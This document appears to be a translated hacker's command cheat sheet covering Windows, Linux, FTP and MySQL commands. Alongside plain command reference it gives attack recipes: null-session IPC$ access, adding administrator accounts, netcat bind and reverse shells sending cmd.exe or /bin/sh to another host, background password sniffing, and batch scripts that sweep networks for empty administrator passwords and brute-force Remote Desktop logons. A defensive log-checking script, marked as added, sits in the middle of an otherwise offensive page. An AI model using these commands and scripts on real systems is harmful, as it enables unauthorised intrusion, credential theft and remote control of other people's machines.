net use \\IP\ipc$ "" /user:""  establish an empty (null-session) IPC$ connection
net use \\IP\ipc$ "password" /user:"username"  establish a non-empty IPC$ connection
net use h: \\IP\c$ "password" /user:"username"  log on and map the remote C: drive to local drive H: in one step
net use h: \\IP\c$  after logging on, map the remote C: drive to local drive H:
net use \\IP\ipc$ /del  delete the IPC$ connection
net use h: /del  delete the mapping of the remote drive to local H:
net user username password /add  create a user
net user guest /active:yes  activate the Guest account
net user  view all accounts
net user accountname  view the attributes of an account
net localgroup administrators username /add  add "username" to the Administrators group, giving it administrator rights. Note: the group name is the plural "administrators", with an "s"
net start  list the services that are running
net start servicename  start a service (for example net start telnet, net start schedule)
net stop servicename  stop a service
net time \\targetIP  view the time on the remote host
net time \\targetIP /set  synchronize the local clock with the "targetIP" host; append /yes to skip the confirmation prompt
net view  view which shares are enabled on the local host
net view \\IP  view which shares are enabled on the remote host
net config  display the system's network settings
net logoff  disconnect a share
net pause servicename  pause a service
net send IP "text"  send a message to the recipient
net ver  show the type of network connection in use on the LAN and related information
net share  view the local shares
net share ipc$  enable the IPC$ share
net share ipc$ /del  delete the IPC$ share
net share c$ /del  delete the C: share
net user guest 12345  after logging on as guest, change the password to 12345
net password password  change the system logon password
netstat -a  commonly used to see which ports are open
netstat -n  commonly used to see the network connections on each port
netstat -v  view work in progress
netstat -p protocol  view the usage of a given protocol, for example netstat -p tcp/ip
netstat -s  view the usage of every protocol in use
nbtstat -A IP  if any of ports 136 to 139 is open on the remote host, shows its user name (the entry listed before <03>). Note: the parameter -A must be uppercase
tracert -parameter IP (or host name)  trace the route a packet takes; the parameter "-w number" sets the timeout interval
ping IP (or domain name)  send 32-byte packets to the host. Parameters: "-l [space] packetsize", "-n number" of packets to send, "-t" ping continuously
ping -t -l 65550 IP  "ping of death" (send packets larger than 64 KB and keep pinging until the host goes down)
ipconfig (winipcfg)  view the local IP address; ipconfig is used on Windows NT and XP, winipcfg on Windows 95/98. The "/all" parameter of ipconfig displays all configuration information
tlist -t  display processes as a tree (a Support Tools utility, not installed by default; found in the support\tools folder of the installation CD)
kill -f processname  with the -f parameter, forcibly terminate a process (also a Support Tools utility, not installed by default; found in the support\tools folder of the installation CD)
del /f filename  with the /f parameter, delete a read-only file. /ar, /ah, /as and /aa delete read-only, hidden, system and archive files respectively; /a-r, /a-h, /a-s and /a-a delete all files except read-only, hidden, system and archive files respectively. For example "del /ar *.*" deletes all read-only files in the current directory and "del /a-s *.*" deletes all files in the current directory except system files
del /s /q directory  or rmdir /s /q directory: /s deletes the directory with all its subdirectories and files; /q suppresses the confirmation prompt so the deletion runs directly (the two commands have the same effect)
move drive:\path\filename destination\path\newname  move a file; the /y parameter suppresses the prompt when the destination already has a file of the same name and overwrites it directly
fc one.txt two.txt > 3st.txt  compare two files and write the output to the file 3st.txt; ">" and ">>" are redirection operators
at id  enable a registered scheduled task
at /delete  stop all scheduled tasks; add /yes to stop them without confirmation
at id /delete  stop a registered scheduled task
at  view all scheduled tasks
at \\IP time programname (or a command) /r  run a program on the remote host at the given time and restart the computer
finger username@host
telnet IP port  remote logon server; default port 23
open IP  connect to an IP address (a command used after logging on with telnet)
telnet  typing telnet alone on the local machine enters the local telnet client
copy path\filename1 path\filename2 /y  copy file 1 to the specified directory as file 2; the /y parameter suppresses the confirmation prompt for overwriting an existing file
copy c:\srv.exe \\IP\admin$  copy the local c:\srv.exe to the remote host's admin$ share
copy 1st.jpg /b + 2st.txt /a 3st.jpg  hide the content of 2st.txt inside 1st.jpg, producing the new file 3st.jpg. Note: 2st.txt should begin with three empty lines. Parameters: /b means a binary file, /a means an ASCII file
copy \\IP\admin$\srv.exe c:\  or copy \\IP\admin$\*.*  copy srv.exe (or all files) from the remote host's admin$ share to the local C: drive
xcopy source-file-or-directory-tree destination  copy files and directory trees; with the /y parameter you are not prompted before overwriting files of the same name
tftp -i own-IP (the IP address of the bot when a bot is used as a stepping stone) get server.exe c:\server.exe  after logging on, download server.exe from the specified IP address to c:\server.exe on the target host. Parameter: -i means binary mode, used for example when transferring an EXE file; without -i the file is transferred in ASCII mode
tftp -i remote-IP put c:\server.exe  after logging on, upload the local c:\server.exe to the host
ftp ip port  upload files to a server or perform file operations; default port 21. bin selects binary transfer (for executables); the default is ASCII transfer (for text files)
route print  display the IP routing table: network address, netmask, gateway address and interface address
arp  view and manipulate the ARP cache; ARP resolves an IP address into a physical (MAC) address. arp -a displays all entries
start programname-or-command /max or /min  open a new window and run a program or command maximized (or minimized)
mem  view CPU usage
attrib filename (or directory)  view the attributes of a file (directory)
attrib filename -a -r -s -h or +a +r +s +h  remove (add) the archive, read-only, system and hidden attributes of a file; + adds an attribute, - removes it
dir  list files. The parameter /q shows which user owns each file and directory; /t:c shows the creation time, /t:a the last-access time and /t:w the last-write time
date /t, time /t  with the /t parameter, "date /t" and "time /t" only display the current date and time instead of prompting for a new one
set variablename=string  set the environment variable to the given value
set  display all current environment variables
set p (or another letter)  display all environment variables whose names begin with p (or that letter)
pause  pause a batch program and display "Press any key to continue..."
if  conditional processing in a batch program (see the if command and variables section below)
goto label  direct cmd.exe to the labeled line in a batch program (the label must be on a line of its own and begin with a colon, for example ":start")
call path\batchfile  call another batch program from within a batch program (see call /? for details)
for  execute a specified command for each file in a set of files (see the for command and variables section below)
echo on or off  enable or disable command echoing; echo with no parameter displays the current echo setting
echo message  display the message on the screen
echo message > pass.txt  save "message" to the file pass.txt
findstr "hello" aa.txt  search for the string hello in aa.txt
find filename  find a file
title name  change the title of the cmd window
color value  set the foreground and background colours of the cmd console; 0 = black, 1 = blue, 2 = green, 3 = aqua (light green), 4 = red, 5 = purple, 6 = yellow, 7 = white, 8 = grey, 9 = light blue, A = light green, B = light aqua, C = light red, D = light purple, E = light yellow, F = bright white
prompt name  change the command prompt displayed by cmd.exe (for example change c:\ and d:\ to entsky\)
print filename  print a text file
ver  display version information in the DOS window
winver  pop up a window showing version information (memory size, system version, patch level and computer name)
format drive: /fs:type  format a disk; type can be FAT, FAT32 or NTFS, for example format d: /fs:ntfs
md directoryname  create a directory
replace sourcefile target-directory  replace files in the target directory with the source file
ren oldname newname  rename a file
tree  display the directory structure as a tree; with the -f parameter the file names in each folder are listed as well
type filename  display the content of a text file
more filename  display a file on screen one page at a time
doskey command-to-lock=string
doskey command-to-unlock=  doskey is a DOS facility for editing command lines, recalling Windows 2000 commands and creating macros; here it is used to lock a command. For example, to lock dir: doskey dir=entsky (doskey dir=dir does not work); to unlock it: doskey dir=
taskmgr  open the Task Manager
chkdsk /f d:  check drive D: and display a status report; the /f parameter also fixes disk errors
tlntadmn  telnet service administration: type tlntadmn, choose 3, then choose 8 to change the telnet service's default port 23 to any other port
exit  exit cmd.exe; the /b parameter exits only the current batch script, not cmd.exe
path executable-path  set a search path for executable files
cmd  start a Windows 2000 command interpreter window; the parameters /e:off and /e:on disable and enable command extensions (see cmd /? for details)
regedit /s regfile  import a registry file into the registry; /s means silent mode, no prompt
regedit /e regfile  export the registry to a file
cacls filename parameters  display or modify the file's access control list (ACL); NTFS only. Parameters: /d username denies the user access; /p username:perm replaces the user's access permission; /g username:perm grants the user the given access permission; perm can be n (none), r (read), w (write), c (change/write) or f (full control). Example: cacls d:\test.txt /d pub denies user pub access to d:\test.txt
cacls filename  view the file's access control list
rem text  add a comment to a batch file
netsh  view or change the local network configuration
IIS service commands:
iisreset /reboot  restart the Windows 2000 computer (a message warns that the system is about to restart)
iisreset /start or /stop  start or stop all Internet services
iisreset /restart  stop and then restart all Internet services
iisreset /status  display the status of all Internet services
iisreset /enable or /disable  enable or disable restarting of the Internet services on the local system
iisreset /rebootonerror  reboot the computer if an error occurs while starting, stopping or restarting the Internet services
iisreset /noforce  if the Internet services cannot be stopped, do not force them to terminate
iisreset /timeout value  wait the given number of seconds for the Internet services to stop; if /rebootonerror is specified, the computer reboots when the timeout expires. Defaults: 20 seconds for restart, 60 seconds for stop, 0 seconds for reboot
FTP commands (details are given later):
The FTP command line format is:
ftp -v -d -i -n -g [hostname]
-v  display all response messages from the remote server
-d  use debugging mode
-n  disable automatic logon, that is, do not use the .netrc file
-g  disable file-name globbing
help [command] or ? [command]  view the description of a command
bye or quit  terminate the FTP process on the host and exit FTP
pwd  list the current directory on the remote host
put or send localfile [remotefile]  transfer a local file to the remote host
get or recv [remotefile] [localfile]  transfer a file from the remote host to the local host
mget [remote-files]  receive a batch of files from the remote host
mput local-files  transfer a batch of files from the local host to the remote host
dir or ls [remote-directory] [local-file]  list the files in the current remote directory; if a local file is given, the result is written to it
ascii  transfer files in ASCII mode (the default)
bin or image  transfer files in binary mode
bell  sound an alert after each file transfer
cdup  return to the parent directory
close  end the FTP session with the remote server (the counterpart of open)
open host [port]  connect to the specified FTP server; a port can be given
delete  delete a file on the remote host
mdelete [remote-files]  delete a batch of files
mkdir directory-name  create a directory on the remote host
rename [from] [to]  rename a file on the remote host
rmdir directory-name  delete a directory on the remote host
status  display the current FTP status
system  display the remote host's system type
user user-name [password] [account]  log on to the remote host as another user
open host [port]  establish a new connection
prompt  toggle interactive prompting
macdef  define a macro
lcd  change the working directory on the local host; with no argument it changes to the current user's home directory
chmod  change file permissions on the remote host
case  when case is on, file names copied with mget are converted to lower case on the local machine
cd remote-dir  enter a directory on the remote host
cdup  enter the parent directory of the current remote directory
!  execute an interactive shell on the local machine; exit returns to the FTP environment, for example ! ls *.zip
MySQL commands:
mysql -h hostaddress -u username -p password  connect to MySQL; on a fresh installation the superuser root has no password
(for example mysql -h110.110.110.110 -uroot -p123456)
Note: there is no space between -u and root; the same applies to the other options
exit  exit MySQL
mysqladmin -u username -p oldpassword password newpassword  change a password
grant select on database.* to username@loginhost identified by "password";  add a new user (note: unlike the preceding commands, this one ends with a semicolon)
show databases;  display the list of databases; initially there are only two, mysql and test. The mysql database holds MySQL's system information; changing passwords and adding users actually operates on this database
use mysql;
show tables;  display the tables in the database
describe tablename;  display a table's structure
create database databasename;  create a database
use databasename;
create table tablename (field definitions);  create a table
drop database databasename;
drop table tablename;  delete a database or a table
delete from tablename;  clear a table's records
select * from tablename;  display a table's records
mysqldump --opt school > school.bbb  (run from DOS in the \mysql\bin directory) back up the database school to the file school.bbb; school.bbb is a text file, open it and you will see the dump
Commands added in Windows 2003 (the practical part):
shutdown /parameter  shut down or restart the local or a remote host.
Parameters: /s shuts down the host, /r restarts it, /t number sets a delay of 0 to 180 seconds, /a cancels a pending shutdown, /m \\IP specifies the remote host.
Example: shutdown /r /t 0  restart the local host immediately (no delay)
taskkill /parameter processname-or-PID  terminate one or more tasks and processes.
Parameters: /pid the PID of the process to terminate (use the tasklist command to obtain each process's PID), /im the name of the process to terminate, /f force termination, /t terminate the process and its child processes.
tasklist  display the processes, services and service identifiers (PIDs) running on the local or a remote host.
Parameters: /m lists the DLL files loaded by each process, /svc shows the services hosted by each process; with no parameter only the processes are listed.
Basic Linux commands (case sensitive):
uname  display version information (like ver in Windows 2000)
dir  list the files in the current directory; ls -al also shows hidden files (like dir in Windows 2000)
pwd  show the current directory
cd ..  go back to the parent directory; note the space between cd and ..; cd / returns to the root directory
cat filename  view the content of a file
cat > abc.txt  write the typed content into the file abc.txt
more filename  display a text file one page at a time
cp  copy files
mv  move files
rm filename  delete a file; rm -r directoryname deletes a directory and its subdirectories
mkdir directoryname  create a directory
rmdir  delete a subdirectory; the directory must be empty
chmod  set the access permissions of files or directories
grep  search for a string in a file
diff  compare files
find  search for files
date  show the current date and time
who  show who is logged on to the same machine, with logon time and location
w  show detailed information about the current host's users
whoami
groups
passwd  change the password
history
ps  display process status
kill  stop a process
gcc  used by hackers to compile files written in C
su  switch to the specified user
telnet IP  connect to a host (as in Windows 2000); when bash$ appears the connection has succeeded
ftp  connect to an FTP server (as in Windows 2000)
Appendix: batch commands and variables
1: The for command and variables. Basic format:
for /parameter %variable in (set) do command [command_parameters]
%variable: a single-letter replaceable parameter, for example %i; the variable is specified as %i and referenced as %i%. Variables are case sensitive (%i is not the same as %I).
Each batch file can use the ten variables %0 to %9: %0 is by default the batch file's name, %1 is by default the first argument given when the batch is run, and %2 to %9 are the second to ninth arguments. For example, in "net use \\IP\ipc$ pass /user:user", IP is %1, pass is %2 and user is %3.
(set): one or more files; wildcards are allowed, for example (d:\user.txt), (1 1 254) or (1 -1 254). In "(1 1 254)" the first 1 is the start value, the second 1 is the step and 254 is the end value, that is, from 1 to 254; "(1 -1 254)" counts down from 254 to 1.
command: the command to execute for each file, for example the net use command; several commands are separated with &.
command_parameters: parameters or command-line switches for the command.
in (set): the values in (set); do command: execute the command.
Parameters: /L means (set) is a numeric range taken in increments; /F means values are read from a file line by line until the end, that is, (set) is a file such as (d:\pass.txt).
Example:
@echo off
echo usage: test.bat *.*.* > test.txt
for /L %%G in (1 1 254) do echo %1.%%G >> test.txt & net use \\%1.%%G /user:administrator | find "command completed successfully" >> test.txt
Save as test.bat. Description: try to create an IPC$ connection as administrator with an empty password to each of the 254 IP addresses of the given class C network segment; the addresses where this succeeds are recorded in test.txt.
/L means the range form (from 1 to 254, step 1); the first three octets of the IP address are typed on the command line as *.*.* and become %1 by default; %G is the variable (the last octet of the IP); & separates the echo and net use commands; | pipes the result of the IPC$ connection into find to look for the "command completed successfully" message; %1.%G is the complete IP address; (1 1 254) gives the start value, step and end value.
@echo off
echo usage: ok.bat IP
for /F %%i in (d:\user.dic) do smb.exe %1 %%i d:\pass.dic 200
Save as ok.bat. Description: after an IP address is entered, use the dictionary file d:\pass.dic to crack the password of each user listed in d:\user.dic until the end of the file is reached. %i is the user name; %1 is the IP address entered (default).
2: The if command and variables. Basic format:
if [not] errorlevel number command  if the program last run returned an exit code equal to or greater than the given number, the condition is true.
For example, if errorlevel 0 executes the following command when the program returned 0; if not errorlevel 1 means the program's return value is not equal to 1.
0 means the task was found and executed successfully (true); 1 means it was not found or not executed (false).
if [not] string1==string2 command  execute the command if the two text strings match (that is, string1 equals string2).
For example, if "%2%"=="4" goto start means: if the second argument entered is 4, jump to the start label (note: when a variable is referenced it is written as %variablename% and enclosed in quotes).
if [not] exist filename command  execute the command if the file exists.
For example, if not exist nc.exe goto end means: if nc.exe is not found, jump to the ":end" label.
if [not] errorlevel number command else command, or if [not] string1==string2 command else command, or if [not] exist filename command else command  with an else clause added, the command after else is executed when the condition is false. Note: else must be on the same line as the if to be valid. When the command is del, the whole del command must be enclosed in parentheses, because del only works when it is on a line of its own; inside parentheses it counts as a single line. For example: if exist test.txt. (del test.txt.) else echo test.txt. missing. Note the "." in the command.
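The for and if forms described in sections 1 and 2 above can be put to defensive use as well. The batch script below is an added example, not part of the original page: it reads a CSV logon log in a hypothetical format (date,time,source_ip,result,user), counts failed logons per source address with for /F and tokens/delims, and uses if exist, if errorlevel, if defined, if ... else and goto to flag any address that reaches a threshold. The log file and threshold arrive as %1 and %2; the sample lines it writes when no log is supplied are constructed data.

```batch
@echo off
rem Added example (not from the original page): count failed logons per source
rem address in a constructed CSV log using the for and if forms described above.
rem Usage: logcheck.bat [logfile] [threshold]
setlocal enabledelayedexpansion

rem %1 is the log file, %2 the number of failures per address that raises an alert
set "LOG=%~1"
if "%LOG%"=="" set "LOG=sample.log"
set "THRESHOLD=%~2"
if "%THRESHOLD%"=="" set "THRESHOLD=2"

rem if [not] exist: write the constructed sample log (hypothetical format:
rem date,time,source_ip,result,user) when no log file was supplied
if not exist "%LOG%" (
    >"%LOG%"  echo 2024-01-01,10:00:01,192.168.1.10,LOGON_FAILED,administrator
    >>"%LOG%" echo 2024-01-01,10:00:02,192.168.1.10,LOGON_FAILED,administrator
    >>"%LOG%" echo 2024-01-01,10:00:03,192.168.1.20,LOGON_OK,alice
    >>"%LOG%" echo 2024-01-01,10:00:04,192.168.1.10,LOGON_FAILED,guest
    >>"%LOG%" echo 2024-01-01,10:00:05,192.168.1.30,LOGON_FAILED,bob
)

rem if errorlevel: find returns 0 when the string occurs and 1 when it does not
find "LOGON_FAILED" "%LOG%" >nul
if errorlevel 1 goto clean

rem for /F with tokens=3,4 delims=, gives %%a the source IP and %%b the result
set "IPLIST="
for /F "usebackq tokens=3,4 delims=," %%a in ("%LOG%") do (
    if "%%b"=="LOGON_FAILED" (
        if not defined CNT_%%a (
            set "CNT_%%a=0"
            set "IPLIST=!IPLIST! %%a"
        )
        set /a "n=!CNT_%%a!+1"
        set "CNT_%%a=!n!"
    )
)

rem if ... else on one line: report the addresses at or above the threshold
for %%i in (%IPLIST%) do (
    if !CNT_%%i! geq %THRESHOLD% (
        echo ALERT %%i !CNT_%%i! failed logons
    ) else (
        echo ok    %%i !CNT_%%i! failed logons
    )
)
goto end

:clean
echo no failed logons found in %LOG%

:end
endlocal
```

Run as logcheck.bat with no arguments to use the constructed sample (192.168.1.10 is reported with 3 failures, 192.168.1.30 with 1), or pass your own file and threshold. Delayed expansion (the !variable! form) is what makes the per-address counters work inside the for block, since %variable% is expanded only once when the whole block is parsed.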
(2) External commands (the tools must be downloaded separately):
1. The Swiss army knife: nc.exe
Parameters:
-h  view help
-d  background mode
-e prog  redirect the program to the connection once it is established [dangerous]
-i secs  delay interval
-l  listen mode for inbound connections
-L  listen mode; after the connection is closed, keep listening until Ctrl+C
-n  numeric IP addresses only, domain names cannot be used
-o file  record a hex dump of the traffic
-p port  local port number
-r  random local and remote ports
-t  telnet interaction mode
-u  UDP mode
-v  verbose output; use -vv for more detail
-w secs  timeout delay interval
-z  zero-I/O mode (used for port scanning)
Basic usage:
nc -nvv 192.168.0.1 80  connect to port 80 of host 192.168.0.1
nc -l -p 80  open TCP port 80 on the local machine and listen
nc -nvv -w2 -z 192.168.0.1 80-1024  scan ports 80-1024 of 192.168.0.1
nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe  bind the remote host's cmd shell to remote TCP port 5354
nc -t -e c:\winnt\system32\cmd.exe 192.168.0.2 5354  bind the remote host's cmd shell and reverse-connect it to port 5354 of 192.168.0.2
Advanced usage:
nc -L -p 80  as a honeypot, usage 1: open port 80 and keep listening until Ctrl+C
nc -L -p 80 > c:\log.txt  as a honeypot, usage 2: open port 80, keep listening until Ctrl+C and write the results to c:\log.txt
nc -L -p 80 < c:\honeyport.txt  as a honeypot, usage 3-1: open port 80, keep listening until Ctrl+C and send the content of c:\honeyport.txt into the pipe; this can also serve to transfer a file
type.exe c:\honeyport.txt | nc -L -p 80  as a honeypot, usage 3-2: open port 80, keep listening until Ctrl+C and send the content of c:\honeyport.txt into the pipe; this can also serve to transfer a file
On the local machine: nc -l -p localport
On the target host: nc -e cmd.exe localIP -p localport  * Windows 2000
On the target host: nc -e /bin/sh localIP -p localport  * Linux, Unix
Reverse connection, to get through the remote host's firewall
On the local machine: nc -d -l -p localport < path\filename-to-transfer
On the remote host: nc -vv localIP localport > path\filename  transfer a file to the host
Supplementary notes:
|  pipe
< or >  redirection; "<" for example tlntadmn < test.txt feeds the content of test.txt to the tlntadmn command as its input
@  execute the command after @ without displaying it (run in the background); for example @dir c:\winnt > d:\log.txt runs dir in the background and stores the result in d:\log.txt
> versus >>  ">" means overwrite; ">>" means append. For example, run @dir c:\winnt > d:\log.txt twice and @dir c:\winnt >> d:\log.txt twice and compare: with >> both results are kept, with > only one result remains, because the second overwrites the first
2. Scanner: xscan.exe
Basic format:
xscan -host <start IP>[-<end IP>] <check items> [other options]  scan all hosts in the range from the start IP to the end IP
xscan -file <host list file> <check items> [other options]  scan all hosts listed in the file
Check items:
-active  check whether the host is alive
-os  detect the remote operating system type (via NetBIOS and SNMP)
-port  detect the status of common service ports
-ftp  detect weak FTP passwords
-pub  check for anonymous FTP write permission
-pop3  detect weak POP3 server passwords
-smtp  detect SMTP server vulnerabilities
-sql  detect weak SQL Server passwords
-smb  detect weak NT server passwords
-iis  detect the IIS encoding/decoding vulnerability
-cgi  detect CGI vulnerabilities
-nasl  load Nessus attack scripts
-all  detect all of the above
Other options:
-i adapter  set the network adapter; the adapter number can be obtained with the -l parameter
-l  display all network adapters
-v  display detailed scan progress
-p  skip hosts that do not respond
-o  skip hosts on which no open port is detected
-t threads,hosts  maximum number of concurrent threads and concurrent hosts; the default number of concurrent hosts is 10
-log filename  file name of the scan report (txt or HTML)
Usage examples:
xscan -host 192.168.1.1-192.168.255.255 -all -active -p  detect all vulnerabilities on hosts in the 192.168.1.1-192.168.255.255 range, skipping unresponsive hosts
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o  detect the standard port status and NT weak-password users of hosts in the 192.168.1.1-192.168.255.255 range, with at most 150 concurrent threads, skipping hosts with no open ports
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o  detect the standard port status and CGI vulnerabilities of all hosts listed in hostlist.txt, with at most 200 concurrent threads and 5 concurrent hosts, showing detailed progress and skipping hosts with no open ports
3. Command-line sniffer: xsniff.exe
Can capture FTP, SMTP, POP3 and HTTP passwords on a LAN
Parameters:
-tcp  output TCP datagrams
-udp  output UDP datagrams
-icmp  output ICMP datagrams
-pass  filter for password information
-hide  run in the background
-host  resolve host names
-addr IP  filter by IP address
-port port  filter by port
-log filename  save the output to a file
-asc  output in ASCII format
-hex  output in hexadecimal format
Usage examples:
xsniff.exe -pass -hide -log pass.log  sniff passwords in the background and store them in the file pass.log
xsniff.exe -tcp -udp -asc -addr 192.168.1.1  sniff 192.168.1.1, filtering TCP and UDP traffic and outputting in ASCII
4. Terminal Services password cracker: tscrack.exe
Parameters:
-h  show help
-v  show version information
-s  show the cracking process on screen
-b  beep when a password is wrong
-t  multiple connections (multithreading)
-n  prevent system log entries on the targeted server
-u  uninstall and remove the tscrack components
-f  use the password given after -f
-F  interval (frequency)
-l  use the user name given after -l
-w  use the password dictionary given after -w
-p  use the password given after -p
-D  log on to the home page
Usage examples:
tscrack 192.168.0.1 -l administrator -w pass.dic  brute-force the administrator logon password of the remote host with the dictionary file
tscrack 192.168.0.1 -l administrator -p 123456  log on to 192.168.0.1 as administrator with the password 123456
@if not exist 3389.txt goto noscan
@for /F "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
:noscan
@echo 3389.txt not found or scan failed
(1) Save as 3389.bat (assuming that superscan or another scanner has produced 3389.txt, a file listing the IP addresses of live hosts with port 3389 open)
3389.bat reads one IP address at a time from 3389.txt and runs hack.bat on it
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic >> rouji.txt
:noscan
@echo tscrack.exe not found or scan failed
(2) Save as hack.bat (run 3389.bat; 3389.bat, hack.bat, 3389.txt, pass.dic and tscrack.exe must all be in the same directory; then wait for the result)
hack.bat runs tscrack.exe to crack the administrator password and saves the result in the file rouji.txt
5. Others:
shutdown.exe
shutdown \\IP t:20  shut down the remote NT host after 20 seconds (a Windows 2003 built-in tool; on earlier Windows versions the tool must be downloaded; see the Windows 2003 DOS commands section above for details)
fpipe.exe (TCP port redirection tool); see the second article (port redirection to get through firewalls) for details
fpipe -l 80 -s 1029 -r 80 www.sina.com.cn  the result is the host information of www.sina.com.cn
fpipe -l 23 -s 88 -r 23 targetIP  telnet requests sent to local port 23 are redirected and sent from port 88 to port 23 of the target IP (so the telnet connection to the target is made from port 88); then connect with telnet 127.0.0.1 (the local IP address) to reach port 23 of the target IP
opentelnet.exe (remotely enable telnet)
opentelnet.exe \\IP account password NTLM-authentication-mode telnet-port  (no need to upload ntlm.exe to defeat Microsoft's authentication) once the remote host's telnet service has been enabled, connect with telnet \\IP
NTLM authentication modes: 0 = do not use NTLM authentication; 1 = try NTLM first and, if it fails, use the user name and password; 2 = use NTLM only
resumetelnet.exe (another tool bundled with opentelnet)
resumetelnet.exe \\IP account password  after connecting to the remote host by telnet, use this command to restore the remote telnet settings and disable the telnet service
6. FTP commands:
FTP is one of the commands Internet users use most often. Being familiar with FTP's internal commands and able to use them flexibly makes things much easier and saves a great deal of effort. If you want to learn to use FTP in the background, you must learn the FTP commands.
The FTP command line format is:
ftp -v -d -i -n -g [hostname], where
-v  display all response messages from the remote server;
-n  disable automatic logon, that is, do not use the .netrc file;
-d  use debugging mode;
-g  disable file-name globbing